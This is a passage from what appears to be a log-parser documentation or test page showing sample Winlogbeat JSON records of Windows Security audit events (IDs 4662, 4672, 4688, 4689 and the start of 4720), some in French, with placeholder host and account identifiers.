:\\t\\t\",\"kind\":\"event\"},\"@version\":\"1\",\"agent\":{\"name\":\"ACCOUNT01\",\"ephemeral_id\":\"12345678-1234-5678-9012-345678901234\",\"type\":\"winlogbeat\",\"version\":\"8.12.2\",\"id\":\"abcdefab-cdef-abcd-efab-cdefabcdefab\"},\"host\":{\"hostname\":\"account01\",\"mac\":[\"00-11-22-33-44-55\"],\"architecture\":\"x86_64\",\"id\":\"11111111-2222-aaaa-bbbb-333333333333\",\"name\":\"account01\",\"ip\":[\"1.2.3.4\"],\"os\":{\"type\":\"windows\",\"build\":\"17763.6414\",\"name\":\"Windows Server 2019 Standard\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"version\":\"10.0\",\"family\":\"windows\"}},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"api\":\"wineventlog\",\"channel\":\"Security\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"task\":\"Directory Service 
Access\",\"process\":{\"pid\":744,\"thread\":{\"id\":864}},\"record_id\":476080242,\"event_id\":\"4662\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"opcode\":\"Informations\",\"computer_name\":\"ACCOUNT01.domain.local\",\"event_data\":{\"HandleId\":\"0x0\",\"SubjectLogonId\":\"0xc2b9d138\",\"ObjectType\":\"%{11111111-aaaa-2222-bbbb-333333333333}\",\"ObjectServer\":\"DS\",\"OperationType\":\"Object Access\",\"SubjectUserSid\":\"S-1-2-3\",\"AdditionalInfo\":\"-\",\"AccessMask\":\"0x100\",\"SubjectDomainName\":\"DOMAIN\",\"ObjectName\":\"%{12345678-abcd-ef90-1234-abcdef123456}\",\"SubjectUserName\":\"ACCOUNT01$\",\"AccessList\":\"%%7688\\n\\t\\t\\t\\t\",\"Properties\":\"%%7688\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\"}}}", + "event": { + "action": "Directory Service Access", + "code": "4662", + "kind": "event", + "module": "security", + "original": "Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\n\nSujet :\n\tID de s\u00e9curit\u00e9 :\t\tS-1-2-3\n\tNom du compte :\t\tACCOUNT01$\n\tDomaine du compte :\t\tDOMAIN\n\tID d\u2019ouverture de session :\t\t0xC2B9D138\n\nObjet :\n\tServeur de l\u2019objet :\t\tDS\n\tType d\u2019objet :\t\t%{11111111-aaaa-2222-bbbb-333333333333}\n\tNom de l\u2019objet :\t\t%{12345678-abcd-ef90-1234-abcdef123456}\n\tID du handle :\t\t0x0\n\nOp\u00e9ration :\n\tType d\u2019op\u00e9ration :\t\tObject Access\n\tAcc\u00e8s :\t\tContr\u00f4ler l\u2019acc\u00e8s\n\t\t\t\t\n\tMasque d\u2019acc\u00e8s :\t\t0x100\n\tPropri\u00e9t\u00e9s :\t\tContr\u00f4ler l\u2019acc\u00e8s\n\t\t{abcdefab-1234-cdef-5678-901234abcdef}\n\t{11111111-aaaa-2222-bbbb-333333333333}\n\n\nInformations suppl\u00e9mentaires :\n\tParam\u00e8tre 1:\t\t-\n\tParam\u00e8tre 2 :\t\t", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:07:11.844000Z", + "action": { + "id": 4662, + "outcome": "success", + "properties": { + "AccessList": 
"%%7688\n\t\t\t\t", + "AccessMask": "0x100", + "AdditionalInfo": "-", + "HandleId": "0x0", + "ObjectName": "%{12345678-abcd-ef90-1234-abcdef123456}", + "ObjectServer": "DS", + "ObjectType": "%{11111111-aaaa-2222-bbbb-333333333333}", + "OperationType": "Object Access", + "Properties": "%%7688\n\t\t{abcdefab-1234-cdef-5678-901234abcdef}\n\t{11111111-aaaa-2222-bbbb-333333333333}", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0xc2b9d138", + "SubjectUserName": "ACCOUNT01$", + "SubjectUserSid": "S-1-2-3" + } + }, + "agent": { + "ephemeral_id": "12345678-1234-5678-9012-345678901234", + "id": "abcdefab-cdef-abcd-efab-cdefabcdefab", + "name": "ACCOUNT01", + "type": "winlogbeat", + "version": "8.12.2" + }, + "host": { + "architecture": "x86_64", + "hostname": "account01", + "id": "11111111-2222-aaaa-bbbb-333333333333", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "00-11-22-33-44-55" + ], + "name": "account01", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "account01" + ], + "ip": [ + "1.2.3.4" + ] + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "ACCOUNT01.domain.local", + "event_id": "4662", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "logon": { + "id": "0xc2b9d138" + }, + "opcode": "Informations", + "process": { + "pid": 744, + "thread": { + "id": 864 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "476080242", + "task": "Directory Service Access" + } + } + + ``` + + +=== "security_event_4672.json" + + ```json + + { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle 
ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"code\":\"4672\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:08:54.122Z\",\"action\":\"Special Logon\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:08:50.647Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"host\":{\"name\":\"USER01-WIN.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Special Logon\",\"computer_name\":\"USER01-WIN.domain.priv\",\"keywords\":[\"Succ\u00e8s de 
l\u2019audit\"],\"opcode\":\"Informations\",\"activity_id\":\"{abcdefab-1234-cdef-5678-901234abcdef}\",\"event_data\":{\"SubjectLogonId\":\"0x40c158b6\",\"PrivilegeList\":\"SeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"USER01-WIN$\",\"SubjectUserSid\":\"S-1-2-3\"},\"process\":{\"thread\":{\"id\":27812},\"pid\":828},\"event_id\":\"4672\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":288206963},\"@version\":\"1\"}", + "event": { + "action": "Special Logon", + "code": "4672", + "kind": "event", + "module": "security", + "original": "Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\n\nSujet :\n\tID de s\u00e9curit\u00e9 :\t\tS-1-2-3\n\tNom du compte :\t\tUSER01-WIN$\n\tDomaine du compte :\t\tDOMAIN\n\tID d\u2019ouverture de session :\t\t0x40C158B6\n\nPrivil\u00e8ges :\t\tSeSecurityPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilege", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:08:50.647000Z", + "action": { + "id": 4672, + "outcome": "success", + "properties": { + "PrivilegeList": "SeSecurityPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilege", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": 
"0x40c158b6", + "SubjectUserName": "USER01-WIN$", + "SubjectUserSid": "S-1-2-3" + } + }, + "agent": { + "ephemeral_id": "12345678-abcd-ef90-1234-abcdef123456", + "id": "11111111-aaaa-2222-bbbb-333333333333", + "name": "AGENT", + "type": "winlogbeat", + "version": "8.11.1" + }, + "host": { + "name": "USER01-WIN.domain.priv" + }, + "log": { + "level": "information" + }, + "related": { + "user": [ + "USER01-WIN" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "USER01-WIN" + }, + "winlog": { + "activity_id": "{abcdefab-1234-cdef-5678-901234abcdef}", + "api": "wineventlog", + "channel": "Security", + "computer_name": "USER01-WIN.domain.priv", + "event_id": "4672", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "logon": { + "id": "0x40c158b6" + }, + "opcode": "Informations", + "process": { + "pid": 828, + "thread": { + "id": 27812 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "288206963", + "task": "Special Logon" + } + } + + ``` + + +=== "security_event_4688.json" + + ```json + + { + "message": "{\"tags\": [\"beats_input_codec_plain_applied\"], \"event\": {\"original\": \"A new process has been created.\\\\n\\\\nCreator Subject:\\\\n\\\\tSecurity ID:\\\\t\\\\tS-1-1-1\\\\n\\\\tAccount Name:\\\\t\\\\tHOST01$\\\\n\\\\tAccount Domain:\\\\t\\\\tCOMPANY\\\\n\\\\tLogon ID:\\\\t\\\\t0x3E7\\\\n\\\\nTarget Subject:\\\\n\\\\tSecurity ID:\\\\t\\\\tS-1-0-0\\\\n\\\\tAccount Name:\\\\t\\\\t-\\\\n\\\\tAccount Domain:\\\\t\\\\t-\\\\n\\\\tLogon ID:\\\\t\\\\t0x0\\\\n\\\\nProcess Information:\\\\n\\\\tNew Process ID:\\\\t\\\\t0x1d9c\\\\n\\\\tNew Process Name:\\\\tC:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wbem\\\\\\\\WmiApSrv.exe\\\\n\\\\tToken Elevation Type:\\\\tTokenElevationTypeDefault (1)\\\\n\\\\tMandatory Label:\\\\t\\\\tS-1-2-3\\\\n\\\\tCreator Process ID:\\\\t0x2a0\\\\n\\\\tCreator Process 
Name:\\\\tC:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\services.exe\\\\n\\\\tProcess Command Line:\\\\tC:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\wbem\\\\\\\\WmiApSrv.exe\\\\n\\\\nToken Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.\\\\n\\\\nType 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.\\\\n\\\\nType 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.\\\\n\\\\nType 3 is a limited token with administrative privileges removed and administrative groups disabled. 
The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.\", \"action\": \"Process Creation\", \"kind\": \"event\", \"outcome\": \"success\", \"created\": \"2023-11-09T08:43:52.407Z\", \"provider\": \"Microsoft-Windows-Security-Auditing\", \"code\": \"4688\"}, \"@version\": \"1\", \"@timestamp\": \"2023-11-09T08:43:51.462Z\", \"message\": \"A new process has been created.\\\\n\\\\nCreator Subject:\\\\n\\\\tSecurity ID:\\\\t\\\\tS-1-1-1\\\\n\\\\tAccount Name:\\\\t\\\\tHOST01$\\\\n\\\\tAccount Domain:\\\\t\\\\tCOMPANY\\\\n\\\\tLogon ID:\\\\t\\\\t0x3E7\\\\n\\\\nTarget Subject:\\\\n\\\\tSecurity ID:\\\\t\\\\tS-1-0-0\\\\n\\\\tAccount Name:\\\\t\\\\t-\\\\n\\\\tAccount Domain:\\\\t\\\\t-\\\\n\\\\tLogon ID:\\\\t\\\\t0x0\\\\n\\\\nProcess Information:\\\\n\\\\tNew Process ID:\\\\t\\\\t0x1d9c\\\\n\\\\tNew Process Name:\\\\tC:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wbem\\\\\\\\WmiApSrv.exe\\\\n\\\\tToken Elevation Type:\\\\tTokenElevationTypeDefault (1)\\\\n\\\\tMandatory Label:\\\\t\\\\tS-1-2-3\\\\n\\\\tCreator Process ID:\\\\t0x2a0\\\\n\\\\tCreator Process Name:\\\\tC:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\services.exe\\\\n\\\\tProcess Command Line:\\\\tC:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\wbem\\\\\\\\WmiApSrv.exe\\\\n\\\\nToken Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.\\\\n\\\\nType 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.\\\\n\\\\nType 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. 
An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.\\\\n\\\\nType 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.\", \"winlog\": {\"computer_name\": \"HOST01.company.test\", \"provider_name\": \"Microsoft-Windows-Security-Auditing\", \"channel\": \"Security\", \"provider_guid\": \"{54849625-5478-4994-a5ba-3e3b0328c30d}\", \"keywords\": [\"Audit Success\"], \"version\": 2, \"event_id\": \"4688\", \"process\": {\"pid\": 4, \"thread\": {\"id\": 17028}}, \"task\": \"Process Creation\", \"event_data\": {\"ParentProcessName\": \"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\services.exe\", \"TokenElevationType\": \"%%1936\", \"MandatoryLabel\": \"S-1-2-3\", \"TargetUserSid\": \"S-1-0-0\", \"SubjectUserSid\": \"S-1-1-1\", \"SubjectDomainName\": \"COMPANY\", \"SubjectLogonId\": \"0x3e7\", \"CommandLine\": \"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\wbem\\\\\\\\WmiApSrv.exe\", \"NewProcessId\": \"0x1d9c\", \"TargetDomainName\": \"-\", \"ProcessId\": \"0x2a0\", \"SubjectUserName\": \"HOST01$\", \"TargetUserName\": \"-\", \"NewProcessName\": \"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wbem\\\\\\\\WmiApSrv.exe\", \"TargetLogonId\": \"0x0\"}, \"record_id\": 8884538, \"api\": \"wineventlog\", \"opcode\": \"Info\"}, \"host\": {\"hostname\": \"host01\", \"id\": \"abcdefgh-1234-5678-abcd-efgh12345678\", \"ip\": [\"8.8.8.8\"], \"name\": \"host01\", \"mac\": [\"00-11-22-33-44-55\"], \"architecture\": \"x86_64\", \"os\": {\"build\": \"20348.2031\", \"version\": \"10.0\", \"name\": \"Windows Server 2022 Standard\", \"family\": \"windows\", \"kernel\": \"10.0.20348.2031 (WinBuild.160101.0800)\", 
\"type\": \"windows\", \"platform\": \"windows\"}}, \"log\": {\"level\": \"information\"}, \"ecs\": {\"version\": \"8.0.0\"}, \"agent\": {\"type\": \"winlogbeat\", \"ephemeral_id\": \"7ecf606a-ee47-4796-a223-4e6bb827233d\", \"id\": \"65ede6f4-4783-4792-8dc0-8364bc33b7bd\", \"version\": \"8.10.4\", \"name\": \"HOST01\"}}", + "event": { + "action": "Process Creation", + "code": "4688", + "kind": "event", + "module": "security", + "original": "A new process has been created.\\n\\nCreator Subject:\\n\\tSecurity ID:\\t\\tS-1-1-1\\n\\tAccount Name:\\t\\tHOST01$\\n\\tAccount Domain:\\t\\tCOMPANY\\n\\tLogon ID:\\t\\t0x3E7\\n\\nTarget Subject:\\n\\tSecurity ID:\\t\\tS-1-0-0\\n\\tAccount Name:\\t\\t-\\n\\tAccount Domain:\\t\\t-\\n\\tLogon ID:\\t\\t0x0\\n\\nProcess Information:\\n\\tNew Process ID:\\t\\t0x1d9c\\n\\tNew Process Name:\\tC:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe\\n\\tToken Elevation Type:\\tTokenElevationTypeDefault (1)\\n\\tMandatory Label:\\t\\tS-1-2-3\\n\\tCreator Process ID:\\t0x2a0\\n\\tCreator Process Name:\\tC:\\\\Windows\\\\System32\\\\services.exe\\n\\tProcess Command Line:\\tC:\\\\Windows\\\\system32\\\\wbem\\\\WmiApSrv.exe\\n\\nToken Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.\\n\\nType 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.\\n\\nType 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. 
An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.\\n\\nType 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2023-11-09T08:43:51.462000Z", + "action": { + "id": 4688, + "outcome": "success", + "properties": { + "CommandLine": "C:\\\\Windows\\\\system32\\\\wbem\\\\WmiApSrv.exe", + "MandatoryLabel": "S-1-2-3", + "NewProcessId": "0x1d9c", + "NewProcessName": "C:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe", + "ParentProcessName": "C:\\\\Windows\\\\System32\\\\services.exe", + "ProcessId": "0x2a0", + "SubjectDomainName": "COMPANY", + "SubjectLogonId": "0x3e7", + "SubjectUserName": "HOST01$", + "SubjectUserSid": "S-1-1-1", + "TargetDomainName": "-", + "TargetLogonId": "0x0", + "TargetUserName": "-", + "TargetUserSid": "S-1-0-0", + "TokenElevationType": "%%1936" + } + }, + "agent": { + "ephemeral_id": "7ecf606a-ee47-4796-a223-4e6bb827233d", + "id": "65ede6f4-4783-4792-8dc0-8364bc33b7bd", + "name": "HOST01", + "type": "winlogbeat", + "version": "8.10.4" + }, + "host": { + "architecture": "x86_64", + "hostname": "host01", + "id": "abcdefgh-1234-5678-abcd-efgh12345678", + "ip": [ + "8.8.8.8" + ], + "mac": [ + "00-11-22-33-44-55" + ], + "name": "host01", + "os": { + "build": "20348.2031", + "family": "windows", + "kernel": "10.0.20348.2031 (WinBuild.160101.0800)", + "name": "Windows Server 2022 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "process": { + "command_line": 
"C:\\\\Windows\\\\system32\\\\wbem\\\\WmiApSrv.exe", + "executable": "C:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe", + "name": "WmiApSrv.exe", + "parent": { + "executable": "C:\\\\Windows\\\\System32\\\\services.exe", + "name": "services.exe", + "pid": 672 + }, + "pid": 7580 + }, + "related": { + "hosts": [ + "host01" + ], + "ip": [ + "8.8.8.8" + ], + "user": [ + "HOST01" + ] + }, + "user": { + "domain": "COMPANY", + "effective": { + "domain": "-", + "id": "S-1-0-0", + "name": "-" + }, + "id": "S-1-1-1", + "name": "HOST01", + "target": { + "domain": "-", + "name": "-" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "HOST01.company.test", + "event_id": "4688", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x3e7" + }, + "opcode": "Info", + "process": { + "pid": 4, + "thread": { + "id": 17028 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "8884538", + "task": "Process Creation", + "version": 2 + } + } + + ``` + + +=== "security_event_4689.json" + + ```json + + { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"code\":\"4689\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:10:18.932Z\",\"action\":\"Process Termination\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:10:13.534Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de 
s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"host\":{\"name\":\"ACCOUNT_01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Process Termination\",\"computer_name\":\"ACCOUNT_01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"SubjectLogonId\":\"0x3e7\",\"Status\":\"0x0\",\"ProcessId\":\"0x1df8\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT_01$\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\process.exe\"},\"process\":{\"thread\":{\"id\":620},\"pid\":4},\"event_id\":\"4689\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":1564712},\"@version\":\"1\"}", + "event": { + "action": "Process Termination", + "code": "4689", + "kind": "event", + "module": "security", + "original": "Un processus est termin\u00e9.\n\nSujet :\n\tID de s\u00e9curit\u00e9 :\t\tS-1-2-3\n\tNom du compte :\t\tACCOUNT_01$\n\tDomaine du compte :\t\tDOMAIN\n\tID d\u2019ouverture de session :\t\t0x3E7\n\nInformations sur le processus :\n\tID du processus :\t0x1df8\n\tNom du processus :\tC:\\Windows\\System32\\process.exe\n\t\u00c9tat de fin :\t0x0", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:10:13.534000Z", + "action": { + "id": 4689, + "outcome": "success", + "properties": { + "ProcessId": "0x1df8", + "ProcessName": 
"C:\\Windows\\System32\\process.exe", + "Status": "0x0", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x3e7", + "SubjectUserName": "ACCOUNT_01$", + "SubjectUserSid": "S-1-2-3" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee", + "name": "AGENT", + "type": "winlogbeat", + "version": "8.11.1" + }, + "host": { + "name": "ACCOUNT_01.domain.priv" + }, + "log": { + "level": "information" + }, + "process": { + "executable": "C:\\Windows\\System32\\process.exe", + "name": "process.exe", + "pid": 7672 + }, + "related": { + "user": [ + "ACCOUNT_01" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "ACCOUNT_01" + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "ACCOUNT_01.domain.priv", + "event_id": "4689", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "logon": { + "id": "0x3e7" + }, + "opcode": "Informations", + "process": { + "pid": 4, + "thread": { + "id": 620 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "1564712", + "task": "Process Termination" + } + } + + ``` + + +=== "security_event_4720.json" + + ```json + + { + "message": 
"{\"tags\":[\"forwarded\",\"beats_input_raw_event\"],\"@version\":\"1\",\"host\":{\"name\":\"HOST01.reseau.company\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.8.0\"},\"agent\":{\"version\":\"7.12.1\",\"name\":\"AGENT\",\"hostname\":\"AGENT\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"type\":\"winlogbeat\"},\"@timestamp\":\"2024-11-12T04:47:02.389Z\",\"user\":{\"domain\":\"RESEAU-COMPANY\",\"id\":\"S-1-2-3\",\"name\":\"user-name\"},\"event\":{\"outcome\":\"success\",\"action\":\"added-user-account\",\"category\":[\"iam\"],\"module\":\"security\",\"kind\":\"event\",\"code\":4720,\"provider\":\"Microsoft-Windows-Security-Auditing\",\"type\":[\"user\",\"creation\"],\"created\":\"2024-11-12T04:47:08.322Z\"},\"fields\":{\"env_AD\":\"AD Company\"},\"log\":{\"level\":\"information\"},\"related\":{\"user\":[\"user-name\",\"USER\"]},\"winlog\":{\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"SubjectDomainName\":\"RESEAU-COMPANY\",\"PrivilegeList\":\"-\",\"UserWorkstations\":\"-\",\"SubjectLogonId\":\"0x2a4b2040\",\"SidHistory\":\"-\",\"TargetUserName\":\"USER\",\"TargetDomainName\":\"RESEAU-COMPANY\",\"OldUacValue\":\"0x0\",\"SubjectUserName\":\"user-name\",\"UserPrincipalName\":\"USER@reseau.company\",\"HomeDirectory\":\"-\",\"AccountExpires\":\"%%1794\",\"SamAccountName\":\"USER\",\"ProfilePath\":\"-\",\"HomePath\":\"-\",\"DisplayName\":\"-\",\"PasswordLastSet\":\"%%1794\",\"AllowedToDelegateTo\":\"-\",\"ScriptPath\":\"-\",\"UserParameters\":\"-\",\"NewUacValue\":\"0x214\",\"LogonHours\":\"%%1793\",\"UserAccountControl\":[\"2082\",\"2084\",\"2089\"],\"NewUACList\":[\"LOCKOUT\",\"NORMAL_ACCOUNT\"],\"PrimaryGroupId\":\"513\",\"TargetSid\":\"S-1-2-3-4-5-6-7\"},\"record_id\":479720536,\"process\":{\"thread\":{\"id\":1940},\"pid\":612},\"opcode\":\"Info\",\"api\":\"wineventlog\",\"event_id\":4720,\"logon\":{\"id\":\"0x2a4b2040\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"keywords\":[\"Aud
